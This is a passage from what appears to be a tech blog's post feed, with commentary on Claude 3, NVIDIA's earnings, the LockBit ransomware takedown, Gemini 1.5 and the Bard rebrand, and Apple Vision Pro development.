It scores 86.8% on the MMLU benchmark (compared to GPT-4\u0026rsquo;s 86.4%), 95.0% on GSM8K math problems, and shows significant improvements in coding tasks. But the numbers I find most interesting are in the reasoning and analysis benchmarks, where Opus shows notably fewer hallucinations than both Claude 2 and GPT-4.\nThis tiered approach mirrors what we\u0026rsquo;ve seen work in cloud computing — offering different performance/cost tradeoffs lets developers optimize for their specific constraints rather than paying for capabilities they don\u0026rsquo;t need.\nThe Vision Capability # All three Claude 3 models now support multimodal input — they can process images alongside text. This is a significant addition. Claude 2 was text-only, which was a real limitation compared to GPT-4V, and multimodal has become the baseline expectation.\nThe vision capability handles photos, charts, diagrams, and technical documents. In my initial testing, I\u0026rsquo;ve been feeding it architecture diagrams and asking for analysis. The results are surprisingly good — it correctly identifies components, relationships, and even calls out potential issues in system design diagrams.\nFor development teams, this opens up interesting workflows:\nAnalyzing screenshots of UI bugs alongside error logs Processing whiteboard photos from design sessions into structured specifications Extracting data from charts and graphs in technical PDFs Understanding hand-drawn wireframes and converting them to requirements It\u0026rsquo;s not perfect — complex diagrams with small text can trip it up — but it\u0026rsquo;s functional enough to be genuinely useful.\nReduced Hallucination and Better Instruction Following # The improvement I care about most isn\u0026rsquo;t raw benchmark scores — it\u0026rsquo;s the reduction in hallucinations. Anthropic reports that Claude 3 Opus is significantly less likely to generate false information compared to Claude 2.1. 
They\u0026rsquo;ve also reduced the model\u0026rsquo;s tendency to refuse harmless prompts, a frustrating issue with Claude 2, which would sometimes decline perfectly reasonable requests out of excessive caution.\nIn practical testing over the past few days, I\u0026rsquo;ve noticed a clear improvement in instruction following. Claude 3 is better at maintaining complex formatting requirements, following multi-step instructions accurately, and staying consistent across long conversations. These are the kinds of improvements that matter more for production applications than headline benchmark numbers.\nAll three tiers also share a 200K-token context window, which puts them well ahead of GPT-4 Turbo\u0026rsquo;s 128K (though behind Google\u0026rsquo;s recently announced Gemini 1.5 Pro at 1 million tokens).\nWhat This Means for the AI Development Landscape # We\u0026rsquo;re now in a genuinely competitive multi-model world, and I think that\u0026rsquo;s unambiguously good for developers. Six months ago, if you needed top-tier LLM capabilities, GPT-4 was essentially your only option. Now you have:\nGPT-4 Turbo from OpenAI: strong all-around, 128K context, extensive tool use ecosystem Claude 3 Opus from Anthropic: competitive or better on benchmarks, 200K context, strong on analysis and coding Gemini 1.5 Pro from Google: million-token context, MoE architecture, strong on long-document tasks Competition drives prices down and capabilities up. We\u0026rsquo;re already seeing this — Claude 3 Sonnet offers performance comparable to GPT-4 at significantly lower cost. OpenAI will have to respond, either with price cuts or capability improvements.\nFor architecture decisions, this multi-model landscape argues strongly for building abstraction layers in your AI integration code. If you\u0026rsquo;re hard-coding calls to a specific model\u0026rsquo;s API, you\u0026rsquo;re leaving money and capability on the table. 
The right model for a task today might not be the right model next quarter.\nMy Take # I\u0026rsquo;ve been using Claude as part of my development workflow since the original release, and Claude 3 is the first version that makes me reach for it as often as GPT-4. The instruction following improvements alone make a noticeable difference in day-to-day usage.\nThe three-tier approach is the right strategy. In production systems, you almost always want to use the cheapest model that meets your quality bar. Having a clear performance/cost ladder lets you make that optimization explicitly rather than using an expensive model for everything.\nWhat I\u0026rsquo;m watching most closely is the developer tooling ecosystem. OpenAI has a significant lead here with their function calling, assistants API, and broad third-party integration support. Anthropic\u0026rsquo;s API is clean but more basic. As models converge in raw capability, the developer experience and tooling around them becomes the differentiator.\nThe pace of improvement across all these labs is remarkable. Six months ago, Claude 2 was clearly a tier below GPT-4. Now Claude 3 Opus is arguably at parity or better. If this pace continues — and there\u0026rsquo;s no sign it\u0026rsquo;s slowing — the capabilities available to developers by the end of 2024 will make today\u0026rsquo;s models look quaint. It\u0026rsquo;s a genuinely exciting time to be building with these tools.\n","date":"7 March 2024","externalUrl":null,"permalink":"/posts/240307-anthropic-claude-3-benchmarks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic launches Claude 3 in three tiers — Haiku, Sonnet, and Opus — with benchmark results that challenge GPT-4’s dominance.","title":"Claude 3 Arrives — Anthropic's New Family of Models Raises the Bar","type":"posts"},{"content":"NVIDIA just reported quarterly revenue of $22.1 billion — a 265% increase year-over-year. 
Their data center division alone brought in $18.4 billion, up 409% from the same quarter last year. These aren\u0026rsquo;t numbers from a speculative bubble. They represent real hardware being bought by real companies building real infrastructure. And if you\u0026rsquo;re a developer or architect working with cloud services, these numbers should reshape how you think about what\u0026rsquo;s coming.\nThe Numbers Behind the Numbers # Let\u0026rsquo;s break down what\u0026rsquo;s actually happening. NVIDIA\u0026rsquo;s data center revenue — which is almost entirely driven by AI accelerator sales (H100, A100, and related networking hardware) — now dwarfs their gaming division by a factor of five. The major cloud providers (AWS, Azure, GCP) are collectively spending tens of billions on GPU clusters. Meta alone announced plans to deploy 350,000 H100 GPUs by the end of 2024.\nBut it\u0026rsquo;s not just the hyperscalers. Enterprise buyers are entering the market aggressively. NVIDIA reported that enterprise and sovereign AI infrastructure orders are growing fast. Countries and large corporations want their own AI compute capacity, not just rented access through cloud APIs.\nJensen Huang called it the start of a new computing era on the earnings call. Normally I\u0026rsquo;d dismiss that as CEO hyperbole, but the financial data actually supports the claim. The capital expenditure flowing into AI infrastructure right now is comparable to the early buildout of cloud computing in the 2010-2015 era — except it\u0026rsquo;s happening faster.\nWhat This Means for Cloud Architecture # If you\u0026rsquo;re designing systems that will run in the cloud over the next few years, the GPU investment wave has direct implications:\nGPU availability is improving but still constrained. Six months ago, getting H100 allocation from any major cloud provider required either a massive spending commitment or a long wait list. 
The supply situation is improving — NVIDIA shipped record volumes this quarter — but demand continues to outpace supply. If your roadmap includes GPU-dependent workloads, plan ahead to secure capacity.\nPricing models are evolving. AWS, Azure, and GCP are all introducing new GPU instance types and pricing tiers. We\u0026rsquo;re seeing the emergence of GPU spot markets, reserved capacity models, and inference-optimized instances that offer different price/performance tradeoffs than training instances. Understanding these options is becoming as important as understanding traditional compute pricing.\nNetwork architecture matters more than ever. Training large models requires not just GPUs but high-bandwidth, low-latency interconnects between them. NVIDIA\u0026rsquo;s InfiniBand and new NVLink networking technologies are becoming critical infrastructure components. If you\u0026rsquo;re building ML platforms, your network topology decisions now have as much impact as your GPU selection.\nEdge inference is the next frontier. While the current spending is heavily focused on training infrastructure, the logical next step is deploying inference at the edge. NVIDIA\u0026rsquo;s Jetson platform and the growing ecosystem of inference-optimized hardware suggest that the GPU buildout will extend beyond centralized data centers.\nThe Software Layer Opportunity # Here\u0026rsquo;s what I find most interesting as a developer: all this hardware needs software. The gap between \u0026ldquo;we bought a bunch of GPUs\u0026rdquo; and \u0026ldquo;we\u0026rsquo;re generating business value from AI\u0026rdquo; is filled entirely by software engineering.\nNVIDIA\u0026rsquo;s CUDA ecosystem has been their real moat for over a decade. But the software stack is getting more complex and more interesting:\nInference optimization frameworks like TensorRT and vLLM are becoming essential for making models actually deployable at reasonable cost. 
Training a model is one thing; serving it to millions of users at acceptable latency and cost is an entirely different engineering challenge.\nOrchestration and scheduling for GPU workloads is still immature compared to CPU workload management. Kubernetes GPU scheduling, NVIDIA\u0026rsquo;s Triton inference server, and emerging platforms like Ray are all vying to become the standard. There\u0026rsquo;s a lot of room for innovation here.\nMonitoring and observability for GPU workloads requires different tools and metrics than traditional applications. GPU utilization, memory bandwidth, thermal throttling, and model serving latency all need dedicated tooling.\nThis is where I think the real opportunities lie for developers and DevOps engineers. The companies buying all this hardware need people who can actually make it useful. CUDA programming, ML ops, inference optimization — these are skills that are going to be in high demand for years.\nThe Sustainability Question # Something that doesn\u0026rsquo;t get enough attention in the AI infrastructure conversation: power consumption. A single H100 GPU draws around 700 watts. A cluster of 350,000 of them — like Meta is building — draws roughly 245 megawatts just for the GPUs, before accounting for cooling, networking, and storage. That\u0026rsquo;s the output of a small power plant dedicated to a single company\u0026rsquo;s AI workloads.\nThe energy requirements of AI infrastructure are already straining data center capacity in key markets. Reports indicate that new data center construction in Northern Virginia — the world\u0026rsquo;s largest data center market — is being delayed by power availability. This isn\u0026rsquo;t a theoretical concern; it\u0026rsquo;s a concrete constraint that\u0026rsquo;s affecting deployment timelines today.\nAs engineers, we should be thinking about computational efficiency not just as a cost optimization but as a responsibility. 
Model distillation, quantization, efficient architectures, and smart caching strategies aren\u0026rsquo;t just nice-to-haves — they\u0026rsquo;re essential for making AI infrastructure sustainable at scale.\nMy Take # I\u0026rsquo;ve seen multiple hardware investment cycles in my career — the PC revolution, the dot-com infrastructure buildout, the cloud migration wave, the mobile explosion. The AI infrastructure buildout shares characteristics with all of them, but the velocity is unprecedented.\nWhat gives me confidence this isn\u0026rsquo;t a bubble is the breadth of adoption. It\u0026rsquo;s not just tech companies buying GPUs. It\u0026rsquo;s banks, pharmaceutical companies, manufacturers, and governments. The use cases are real, even if some are still being figured out.\nFor developers, the message is clear: understanding GPU infrastructure, ML operations, and AI system design is becoming as fundamental as understanding cloud computing was a decade ago. You don\u0026rsquo;t have to become an ML researcher, but you should understand how these systems work, how they\u0026rsquo;re deployed, and how they\u0026rsquo;re maintained. 
The infrastructure being built today will define the platform we all build on for the next decade.\n","date":"29 February 2024","externalUrl":null,"permalink":"/posts/240229-nvidia-earnings-ai-infrastructure-boom/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s record Q4 earnings reveal the staggering scale of AI infrastructure investment and what it means for developers and cloud architecture.","title":"NVIDIA's $22 Billion Quarter — The AI Infrastructure Gold Rush Is Real","type":"posts"},{"content":"On February 19th, something happened that many of us in the industry thought we might never see: a coordinated international law enforcement operation — dubbed \u0026ldquo;Operation Cronos\u0026rdquo; — successfully seized and disrupted the infrastructure of LockBit, arguably the most prolific ransomware operation in the world. The UK\u0026rsquo;s National Crime Agency, working with the FBI, Europol, and agencies from ten countries, didn\u0026rsquo;t just take down servers. They took over LockBit\u0026rsquo;s own leak site and used it to post countdown timers revealing the identities of the operators. That\u0026rsquo;s a level of trolling that even the most seasoned security researchers appreciated.\nThe Scale of LockBit # For those who haven\u0026rsquo;t been tracking ransomware trends closely, LockBit has been the dominant ransomware-as-a-service (RaaS) operation since roughly 2022. They claimed responsibility for over 2,000 attacks globally, extracting more than $120 million in ransom payments according to the US Department of Justice. Their victims included hospitals, schools, financial institutions, and critical infrastructure across dozens of countries.\nWhat made LockBit particularly dangerous was their business model innovation. They ran a slick affiliate program — essentially franchising their ransomware to other criminals. 
Affiliates would gain access to victim networks, deploy LockBit\u0026rsquo;s encryptor, and split the proceeds. The core team maintained the malware, the leak site, and the negotiation infrastructure. It was organized crime operating with the efficiency of a SaaS startup.\nLockBit 3.0, their latest variant, even had a bug bounty program for their ransomware. They offered rewards starting at $1,000 to anyone who found vulnerabilities in their encryptor. The professionalization of cybercrime has been a trend for years, but LockBit took it to another level.\nHow Operation Cronos Worked # The technical details emerging from the takedown are fascinating. Law enforcement didn\u0026rsquo;t just seize domain names — they exploited a vulnerability in LockBit\u0026rsquo;s own infrastructure. Reports indicate that investigators exploited CVE-2023-3824, a buffer overflow in PHP, to compromise LockBit\u0026rsquo;s backend servers.\nThe irony is thick. A group that made more than $120 million exploiting software vulnerabilities in their victims\u0026rsquo; systems was taken down by a software vulnerability in their own platform. It\u0026rsquo;s a reminder that nobody — not even sophisticated criminal operations — is immune to the basic challenges of software security.\nLaw enforcement seized 34 servers across multiple countries, froze over 200 cryptocurrency wallets, and obtained roughly 1,000 decryption keys that are now being used to help victims recover their data without paying ransoms. They also arrested two individuals in Poland and Ukraine, with additional indictments unsealed in the US. This represents a significant escalation in coordinated international cyber law enforcement.\nPerhaps most significantly, they gained access to LockBit\u0026rsquo;s backend database, which contains records of every attack, every negotiation, and every payment. 
That\u0026rsquo;s an intelligence goldmine that will fuel investigations for years.\nThe Bigger Picture for Security Teams # For those of us managing infrastructure and development pipelines, the LockBit takedown is encouraging but shouldn\u0026rsquo;t change our security posture. Here\u0026rsquo;s why:\nRansomware isn\u0026rsquo;t going away. LockBit was the biggest player, but they weren\u0026rsquo;t the only one. ALPHV/BlackCat, Play, 8Base, and dozens of smaller operations continue to operate. When one group falls, affiliates migrate to competitors. We\u0026rsquo;ve seen this pattern before with REvil and Conti.\nThe attack vectors remain the same. LockBit affiliates typically gained initial access through phishing, exploiting unpatched VPN appliances (Citrix, Fortinet), and abusing remote desktop protocols. These entry points haven\u0026rsquo;t changed. If you weren\u0026rsquo;t patching your edge devices before this takedown, you\u0026rsquo;re still vulnerable — just to different groups.\nSupply chain attacks are accelerating. What concerns me more than any single ransomware group is the trend toward supply chain compromise. The techniques that groups like LockBit used are increasingly being adopted by more sophisticated actors who target build pipelines, package repositories, and CI/CD systems directly.\nPractical Takeaways # If this story motivates you to review your security posture — good. Here\u0026rsquo;s where I\u0026rsquo;d focus:\nPatch management for edge devices. VPN concentrators, firewalls, and load balancers are the number one entry point. Treat patches for these devices as emergency priority, not regular maintenance.\nBackup integrity testing. Most organizations have backups. Fewer test that those backups actually work, are isolated from the network, and can be restored in a reasonable timeframe. Ransomware groups specifically target backup infrastructure.\nNetwork segmentation. 
The difference between a ransomware incident and a ransomware catastrophe is often lateral movement. If an attacker compromises one system, can they reach your crown jewels? Flat networks are death.\nIncident response planning. Have a plan. Test it. Know who you\u0026rsquo;re calling at 2 AM on a Saturday. Law enforcement coordination matters — as Operation Cronos shows, they can actually help.\nMy Take # I\u0026rsquo;ve been in this industry long enough to be cynical about \u0026ldquo;landmark\u0026rdquo; law enforcement operations. We celebrated when REvil was taken down in 2022, and ransomware attacks actually increased afterward. Criminal ecosystems are resilient.\nBut Operation Cronos feels different in one important way: the psychological impact. By taking over LockBit\u0026rsquo;s own infrastructure and using it against them, law enforcement sent a message to every RaaS operator and affiliate: your infrastructure isn\u0026rsquo;t safe either. The trust model that makes ransomware-as-a-service work — affiliates trusting that the platform will protect them — just took a serious hit.\nWill this end ransomware? No. Will it create a significant disruption and potentially deter some affiliates from the business? I think so. And in the long game of cybersecurity, disruption and deterrence are about the best we can hope for.\nIn the meantime, patch your systems, test your backups, and segment your networks. The fundamentals haven\u0026rsquo;t changed.\n","date":"22 February 2024","externalUrl":null,"permalink":"/posts/240222-lockbit-takedown-operation-cronos/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"An international law enforcement coalition takes down the LockBit ransomware group’s infrastructure in a landmark operation.","title":"Operation Cronos — The LockBit Takedown and What It Means for Cybersecurity","type":"posts"},{"content":"Google dropped something genuinely significant today. 
Gemini 1.5 Pro, announced at their latest event, ships with a context window of up to 1 million tokens. To put that in perspective, that\u0026rsquo;s roughly 700,000 words — the equivalent of feeding an entire codebase, a full book, or hours of video into a single prompt. We\u0026rsquo;ve gone from GPT-3\u0026rsquo;s 4K tokens to this in under two years. The pace is staggering.\nWhy Context Length Matters More Than You Think # Most developers I talk to still think of LLMs as fancy autocomplete tools. You paste in a snippet, you get a snippet back. But context length is the quiet variable that determines what class of problems these models can actually tackle.\nWith 4K or even 32K tokens, you\u0026rsquo;re fundamentally limited. You can\u0026rsquo;t feed in a full repository. You can\u0026rsquo;t give the model your entire test suite alongside your implementation. You\u0026rsquo;re always doing this awkward dance of summarization and chunking, which means you\u0026rsquo;re always losing information.\nA million tokens blows that constraint wide open. Google\u0026rsquo;s demo showed Gemini 1.5 Pro ingesting the entire 402-page transcript of Apollo 11\u0026rsquo;s mission and answering detailed questions about specific moments. They also fed it a 100,000-line codebase and asked it to identify bugs. This isn\u0026rsquo;t a parlor trick — it\u0026rsquo;s a fundamentally different capability.\nThe Architecture Behind It: Mixture of Experts # What\u0026rsquo;s technically interesting here is that Google achieved this with a Mixture of Experts (MoE) architecture. Rather than activating the entire neural network for every token, MoE models route each input through a subset of specialized \u0026ldquo;expert\u0026rdquo; sub-networks. 
This means you can scale the model\u0026rsquo;s total parameter count without proportionally scaling the compute required for each inference.\nGoogle hasn\u0026rsquo;t published the full technical details yet, but based on what they\u0026rsquo;ve shared, Gemini 1.5 Pro is significantly more efficient than its predecessor at processing long contexts. The MoE approach isn\u0026rsquo;t new — it goes back to the early \u0026rsquo;90s — but applying it at this scale to achieve million-token context is a genuine engineering achievement.\nThe practical implication: the model can handle the long context without the latency and cost scaling linearly with input size the way traditional dense transformer models would. That\u0026rsquo;s what makes this commercially viable rather than just a research curiosity.\nWhat This Means for Developer Workflows # I\u0026rsquo;ve been thinking about what a million-token context window enables for actual software engineering work, and a few use cases stand out:\nFull-repository analysis. Instead of pointing an AI at individual files, you can feed it your entire project. Architecture reviews, dependency analysis, cross-cutting concern identification — all become possible in a single pass. No more RAG pipelines to approximate \u0026ldquo;understanding\u0026rdquo; of your codebase.\nDocumentation generation at scale. Feed the model your codebase plus your existing (probably outdated) docs, and ask it to reconcile the two. With enough context, it can identify what\u0026rsquo;s changed and what documentation is stale.\nLong-form code migration. Moving from one framework to another typically requires understanding patterns across dozens of files simultaneously. A million tokens gets you there for medium-sized projects.\nTest generation with full context. 
Generate tests that actually understand the relationships between components, because the model can see all the components at once.\nThe catch, of course, is that context length isn\u0026rsquo;t the same as comprehension. Google\u0026rsquo;s own benchmarks show that retrieval accuracy within very long contexts can degrade, particularly for information buried in the middle of the input — the well-documented \u0026ldquo;lost in the middle\u0026rdquo; problem. A million tokens of capacity doesn\u0026rsquo;t mean a million tokens of perfect recall.\nThe Competitive Pressure # This announcement puts serious pressure on OpenAI and Anthropic. GPT-4 Turbo currently tops out at 128K tokens. Claude 2.1 offers 200K. Google just leapfrogged both by an order of magnitude.\nNow, there\u0026rsquo;s a legitimate question about whether most applications actually need a million tokens. For the vast majority of current LLM use cases — chatbots, simple code completion, content generation — 128K is probably fine. But the history of computing tells us that when you give developers a 10x resource increase, they don\u0026rsquo;t just do the same things faster. They find entirely new things to do.\nI remember when 640KB of RAM was \u0026ldquo;enough for anyone.\u0026rdquo; Then when a 1GB hard drive seemed absurd. Every time we\u0026rsquo;ve expanded a fundamental constraint by an order of magnitude, new categories of applications emerged that nobody predicted.\nMy Take # I\u0026rsquo;m cautiously excited about this. Google has had a rough stretch with AI announcements — the Gemini Ultra launch was underwhelming relative to the hype, and the image generation issues didn\u0026rsquo;t help. But on pure technical merit, a million-token MoE model is impressive work.\nThe real question is whether Google can translate this technical advantage into developer adoption. The API pricing, rate limits, and actual real-world performance will matter more than the headline number. 
I\u0026rsquo;ve seen too many impressive demos that fell apart under production workloads.\nWhat I\u0026rsquo;m most interested in is how this shifts the RAG versus long-context debate. A lot of engineering effort right now goes into building retrieval-augmented generation pipelines to work around context limitations. If those limitations disappear, does all that infrastructure become unnecessary? I suspect the answer is \u0026ldquo;partially\u0026rdquo; — RAG still offers benefits for truly massive document collections — but the sweet spot is definitely shifting.\nWe\u0026rsquo;re in the middle of a capability ramp that\u0026rsquo;s unlike anything I\u0026rsquo;ve seen in three decades of software engineering. The question isn\u0026rsquo;t whether these tools will change how we work — it\u0026rsquo;s how quickly we\u0026rsquo;ll adapt.\n","date":"15 February 2024","externalUrl":null,"permalink":"/posts/240215-gemini-1-5-million-token-context/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s Gemini 1.5 Pro launches with a 1 million token context window, fundamentally reshaping what’s possible with large language models.","title":"Gemini 1.5 Pro — A Million Tokens Changes the Game","type":"posts"},{"content":"Google just made one of those moves that looks like pure marketing but is actually deeply strategic: Bard is now Gemini. The chatbot interface has been renamed, there\u0026rsquo;s a new Gemini Advanced tier powered by the Ultra 1.0 model, a dedicated Android app, and iOS integration through the Google app. If you blink, you might mistake this for a simple rebrand. It\u0026rsquo;s not.\nWhat Google is really doing is consolidating its AI identity around a single name that spans from consumer chatbot to developer API to cloud infrastructure. 
It\u0026rsquo;s a direct play to challenge OpenAI\u0026rsquo;s brand dominance, and for those of us building on Google\u0026rsquo;s AI tools, the implications are worth understanding.\nWhat Actually Changed # Let\u0026rsquo;s separate the substance from the branding. The core changes this week are:\nGemini Advanced ($19.99/month as part of the Google One AI Premium plan): This gives users access to the Gemini Ultra 1.0 model, which Google claims outperforms GPT-4 on various benchmarks. Ultra is the largest model in the Gemini family — the one Google has been talking about since the December announcement but hadn\u0026rsquo;t made publicly accessible until now.\nThe Gemini app: A standalone Android app that replaces Google Assistant as the default AI interface on your phone. On iOS, it\u0026rsquo;s accessible within the Google app. This is significant because it puts Gemini in the position of being a system-level assistant, not just a chat interface you visit in a browser tab.\nAPI alignment: The Gemini API, already available through Google AI Studio and Vertex AI, now shares a name with the consumer product. This matters more than it sounds — when your CEO reads about \u0026ldquo;Gemini\u0026rdquo; in the news and your development team is already using the Gemini API, that\u0026rsquo;s a much easier budget conversation than explaining why you need access to \u0026ldquo;PaLM 2 via Vertex AI.\u0026rdquo;\nThe Developer Experience: Where Things Stand # I\u0026rsquo;ve been building with Google\u0026rsquo;s AI APIs since the early PaLM days, and the current state of the Gemini developer experience is a mixed bag.\nOn the positive side, the Gemini API through Google AI Studio is genuinely good for prototyping. You can get up and running with the Pro model in minutes, the pricing is competitive (the Pro model has a generous free tier), and the multimodal capabilities — text, images, and video as inputs — are impressive. 
Gemini Pro handles code generation and technical reasoning well, often on par with GPT-3.5 Turbo in my testing.\nThe Vertex AI integration gives you the enterprise features you\u0026rsquo;d expect: VPC controls, data residency, fine-tuning, and model evaluation tools. If you\u0026rsquo;re already in the Google Cloud ecosystem, adding Gemini to your stack is straightforward.\nBut there are friction points. The documentation is fragmented — you\u0026rsquo;ll find yourself bouncing between Google AI Studio docs, Vertex AI docs, and general Gemini documentation, and they don\u0026rsquo;t always agree. The SDK situation is messy, with both the google-generativeai package (for AI Studio) and the google-cloud-aiplatform package (for Vertex AI) offering Gemini access through different interfaces.\nAnd honestly, the model performance gap between Pro and Ultra matters. Pro is solid but not spectacular. Ultra — now available through Gemini Advanced — is the model that\u0026rsquo;s supposed to compete with GPT-4, but developer API access to Ultra is still limited to preview.\nThe Multimodal Advantage # Where Gemini genuinely differentiates itself is in multimodal capabilities. The ability to feed images, video, and audio directly to the model as part of a prompt opens up use cases that are harder to achieve with the current OpenAI API.\nI\u0026rsquo;ve been experimenting with Gemini Pro Vision for a project that involves analyzing infrastructure diagrams — think architecture documents, network topologies, and deployment schemas. The model\u0026rsquo;s ability to parse visual information and reason about it in context is genuinely useful. Feed it a screenshot of a Kubernetes dashboard and ask what\u0026rsquo;s wrong — you\u0026rsquo;ll get surprisingly insightful responses.\nThe 1 million token context window that Google announced for Gemini 1.5 (coming soon, they say) would be transformative for code analysis, documentation processing, and long-form reasoning tasks. 
If that delivers on its promise, it\u0026rsquo;ll be a significant differentiator against OpenAI\u0026rsquo;s current 128K context limit.\nThe Platform Wars Are Good for Developers # Here\u0026rsquo;s the thing that matters most for us as practitioners: the competition between Google, OpenAI, Anthropic, and others is driving rapid improvement and price compression. Six months ago, a GPT-4-class model was $30-60 per million tokens. Google is now offering Gemini Pro for free up to a generous rate limit, and even the premium tiers are competitive.\nThis competition is also pushing all providers to improve their developer experience. The speed of iteration on SDKs, documentation, and tooling has been remarkable. Not always in a good way — breaking changes are frequent — but the trajectory is clearly toward better, cheaper, and more capable.\nFor my own projects, I\u0026rsquo;ve adopted a multi-model strategy. I use OpenAI\u0026rsquo;s GPT-4 for tasks where I need reliable instruction following, Anthropic\u0026rsquo;s Claude for long-context analysis, and Gemini Pro for multimodal tasks and situations where cost matters. The abstraction layers (LangChain, LiteLLM) make this relatively painless, though each model has its quirks that you learn to work around.\nMy Take # The rebrand from Bard to Gemini is more than cosmetic. It signals that Google is serious about AI as a unified platform play, not a collection of research projects with confusing names. For too long, Google\u0026rsquo;s AI story was fragmented — PaLM, Bard, Duet AI, Gemini — and developers weren\u0026rsquo;t sure which horse to back. Consolidating under Gemini provides clarity.\nThat said, Google has a pattern of launching AI products with great fanfare and then losing interest. (Remember Google Duplex? Google Lens\u0026rsquo; original AI ambitions?) 
The test will be whether they sustain the investment in developer experience, documentation, and model quality over the next twelve months.\nIf you\u0026rsquo;re currently building exclusively on OpenAI\u0026rsquo;s stack, this is a good moment to experiment with Gemini. Not to switch — to diversify. The AI landscape is moving too fast to be locked into a single provider, and Google\u0026rsquo;s multimodal capabilities and competitive pricing make it a legitimate option for production workloads.\nThe AI naming game is getting real, and for once, the marketing actually reflects genuine technical progress. That\u0026rsquo;s a good thing for all of us building in this space.\n","date":"8 February 2024","externalUrl":null,"permalink":"/posts/240208-google-gemini-rebrand-ai-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google retires the Bard brand and goes all-in on Gemini. Behind the marketing refresh is a real technical shift with implications for developers building on Google’s AI stack.","title":"Google Rebrands Bard to Gemini — The AI Naming Game Gets Real","type":"posts"},{"content":"Tomorrow, February 2nd, Apple Vision Pro goes on sale in the United States. At $3,499, it\u0026rsquo;s not a consumer device — Apple knows this, the press knows this, and most importantly, we as developers should know this. What it is, though, is Apple\u0026rsquo;s most significant platform bet since the iPhone, and the developer implications deserve serious examination.\nI\u0026rsquo;ve been following the visionOS developer tools since they were announced at WWDC last June, and I\u0026rsquo;ve had access to the simulator and documentation since the beta program opened. Here\u0026rsquo;s my honest assessment of where things stand from a software development perspective.\nvisionOS: A Familiar-Yet-Foreign SDK # If you\u0026rsquo;ve built iOS or macOS apps with SwiftUI, the on-ramp to visionOS development is surprisingly gentle. 
Apple has designed the SDK so that many existing SwiftUI views can be placed in a \u0026ldquo;window\u0026rdquo; in spatial space with minimal modifications. Your standard 2D interface becomes a floating panel that users can position in their physical environment.\nThe development environment centers around Xcode 15.2 with the visionOS simulator, which runs on any recent Mac. You don\u0026rsquo;t need the actual hardware to start building, which is the right call from a platform adoption standpoint. The simulator renders a 3D space on your 2D screen with click-and-drag controls for eye tracking and hand gestures.\nWhere things get interesting — and significantly more complex — is when you move beyond 2D windows into what Apple calls \u0026ldquo;volumes\u0026rdquo; and \u0026ldquo;immersive spaces.\u0026rdquo; Volumes are 3D containers that live alongside the user\u0026rsquo;s real environment, while immersive spaces can range from mixed reality overlays to fully immersive virtual environments.\nBuilding for volumes requires working with RealityKit, Apple\u0026rsquo;s 3D rendering framework, and potentially Reality Composer Pro for designing 3D scenes. If you\u0026rsquo;ve never worked with 3D rendering pipelines, the learning curve here is steep. Coordinate systems, spatial anchoring, collision detection, and 3D asset management are all areas where traditional app developers will need to upskill.\nThe Input Model Changes Everything # What fascinates me most about visionOS from a development perspective is the input model. There\u0026rsquo;s no touch screen, no mouse, no trackpad. The primary inputs are eye tracking (where you look), hand gestures (pinch, tap, drag), and voice (through Siri integration).\nThis fundamentally changes how you think about interaction design. Hit targets need to be larger and more spaced out because eye tracking has inherent precision limitations. 
You can\u0026rsquo;t rely on hover states — or rather, \u0026ldquo;hover\u0026rdquo; now means \u0026ldquo;the user is looking at this element.\u0026rdquo; Gesture recognition needs to be forgiving because users\u0026rsquo; hands are in free space, not resting on a stable surface.\nFor developers who\u0026rsquo;ve been building web and mobile interfaces for years, this is both exciting and humbling. Many of our accumulated instincts about UI design don\u0026rsquo;t directly translate. The spatial computing paradigm genuinely requires rethinking interaction patterns from first principles.\nThe accessibility implications are also significant. Apple has included head tracking, voice control, and pointer-based alternatives for users who can\u0026rsquo;t use the standard eye-and-hand input model, but as developers, we need to test these pathways deliberately.\nThe Enterprise Case Is Stronger Than Consumer # Having watched the pre-release coverage and developer discussions, I\u0026rsquo;m increasingly convinced that Vision Pro\u0026rsquo;s near-term value is in enterprise and professional applications, not consumer entertainment.\nConsider the use cases that make sense at this price point: architectural visualization where clients can walk through buildings before construction, medical imaging where surgeons can examine 3D models of patient anatomy, remote collaboration where distributed teams can share a virtual workspace, and industrial design where engineers can prototype in spatial context.\nThese are applications where the cost of the device is trivial compared to the value it delivers, and where the immersive 3D environment provides genuine advantages over flat screens. If your company works in any of these domains, exploring visionOS development now makes strategic sense.\nThe consumer use cases — watching movies on a virtual big screen, casual gaming, social media — feel like justifications rather than motivations. 
They\u0026rsquo;re nice-to-haves that don\u0026rsquo;t warrant a $3,499 investment for most people. Apple will eventually bring the price down, but that\u0026rsquo;s a future-generation play.\nWhat About the Web? # Here\u0026rsquo;s something that hasn\u0026rsquo;t gotten enough attention: Safari on visionOS supports WebXR. That means existing WebXR content — 3D models, spatial experiences, AR overlays — works in Vision Pro\u0026rsquo;s browser without any native app development.\nFor web developers, this is actually the most accessible entry point into spatial computing. If you\u0026rsquo;ve built WebXR experiences for other headsets or mobile AR browsers, they\u0026rsquo;ll work on Vision Pro. The web platform gives you cross-device reach that native visionOS apps can\u0026rsquo;t match.\nI\u0026rsquo;ve been experimenting with Three.js and A-Frame projects in the visionOS simulator, and the results are promising. The rendering performance is impressive, and the integration with the system\u0026rsquo;s eye-tracking input model works through standard WebXR APIs.\nIf you want to dip your toes into spatial computing without committing to the Apple ecosystem, WebXR is the way to go.\nMy Take # I\u0026rsquo;m not rushing out to buy a Vision Pro. At this price point and first-generation maturity level, it\u0026rsquo;s a developer kit wearing consumer clothing. But I am taking the platform seriously.\nApple has a track record of creating markets that didn\u0026rsquo;t exist before — or rather, of making markets viable that others explored prematurely. The iPhone wasn\u0026rsquo;t the first smartphone, the iPad wasn\u0026rsquo;t the first tablet, and Vision Pro isn\u0026rsquo;t the first mixed reality headset. But Apple tends to get the developer experience right in ways that matter for long-term ecosystem growth.\nMy practical advice: if you\u0026rsquo;re a SwiftUI developer, spend a weekend with the visionOS simulator. 
